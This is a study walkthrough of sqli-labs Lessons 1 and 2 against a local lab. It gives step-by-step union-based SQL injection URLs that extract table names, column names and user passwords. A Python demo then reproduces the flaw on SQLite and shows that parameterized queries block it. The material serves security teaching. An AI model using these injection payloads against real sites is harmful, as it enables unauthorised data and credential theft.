Note: some of the commands below may contain full-width Chinese punctuation that causes them to fail when pasted, so check the quotes and dashes carefully.
Database name: database()
Database version: version()
Database user: user()
Operating system: @@version_compile_os
System user name: system_user()
Current user name: current_user
User name of the database connection: session_user()
Data directory path: @@datadir
MySQL installation path: @@basedir
Table holding the names of all tables: information_schema.tables
Table name column: table_name
Database name column: table_schema
Column name column: column_name
Table holding the names of all columns: information_schema.columns
Lesson 1
Lesson 1 is a union-based injection.
Find the injection point ---- determine whether it is numeric or string type ---- find the number of columns ---- find the display positions ---- get the database name ---- get the table names in the database ---- get the column names ---- get the data in the columns. Whether the injection is union-based, blind, or another type, the flow is basically the same, differing only in the details.
http://localhost/sqli-labs-master/Less-1/?id=1' -- -
http://localhost/sqli-labs-master/Less-1/?id=1' and 1=1-- -
http://localhost/sqli-labs-master/Less-1/?id=1' and 1=2-- -
http://localhost/sqli-labs-master/Less-1/?id=1' order by 3-- -
http://localhost/sqli-labs-master/Less-1/?id=1' order by 4-- -
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,3-- -
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,database(),user()-- -
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3 -- -
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),3 -- -
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(concat_ws(id,username,password)) from users),3-- -
Lesson 2
Lesson 2 is also a union-based injection and works the same way as Lesson 1; only the way the query is closed differs (the parameter is numeric, so no closing quote is needed).
http://localhost/sqli-labs-master/Less-2/?id=1 and 1=1
http://localhost/sqli-labs-master/Less-2/?id=1 and 1=2
http://localhost/sqli-labs-master/Less-2/?id=1 order by 3
http://localhost/sqli-labs-master/Less-2/?id=1 order by 4
http://localhost/sqli-labs-master/Less-2/?id=1 union select 1,2,3
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,database(),user()
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),3
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(concat_ws(id,username,password)) from users),3
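The following is an added example, not part of the sqli-labs walkthrough, showing why the Lesson 1 (quoted) and Lesson 2 (unquoted) closures both work against string-concatenated queries and why a parameterized query stops both. It uses an in-memory SQLite table with constructed rows as a stand-in for the MySQL "security" database; MySQL-only helpers such as database() and concat_ws() are replaced with group_concat(username).

```python
import sqlite3

# Constructed in-memory stand-in for the walkthrough's "security" database.
# SQLite is used so the example runs offline; the concatenation bug is the
# same on MySQL, only the helper functions (database(), concat_ws) differ.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you');
    """)
    return conn

def lookup_less1_style(conn, user_id):
    # Lesson 1 shape: the value sits inside single quotes, so a ' in the input
    # closes the literal and "-- -" comments out the trailing LIMIT.
    sql = "SELECT id, username, password FROM users WHERE id='%s' LIMIT 1" % user_id
    return conn.execute(sql).fetchall()

def lookup_less2_style(conn, user_id):
    # Lesson 2 shape: the value is interpolated unquoted, so no closing quote
    # (and no comment) is needed for the UNION to attach to the query.
    sql = "SELECT id, username, password FROM users WHERE id=%s LIMIT 1" % user_id
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, user_id):
    # Fixed form: the value is bound as data and never parsed as SQL, so
    # neither closure style can change the statement. Same fix for both lessons.
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_id,)).fetchall()

# Payloads in the shape of the walkthrough's final step, adapted to SQLite.
LESS1_PAYLOAD = "-1' union select 1,(select group_concat(username) from users),3-- -"
LESS2_PAYLOAD = "-1 union select 1,(select group_concat(username) from users),3"

if __name__ == "__main__":
    db = make_db()
    print(lookup_less1_style(db, LESS1_PAYLOAD))   # usernames appear in position 2
    print(lookup_less2_style(db, LESS2_PAYLOAD))   # same result, no quote needed
    print(lookup_parameterized(db, LESS1_PAYLOAD)) # [] : payload treated as data
    print(lookup_parameterized(db, "1"))           # the one intended row
```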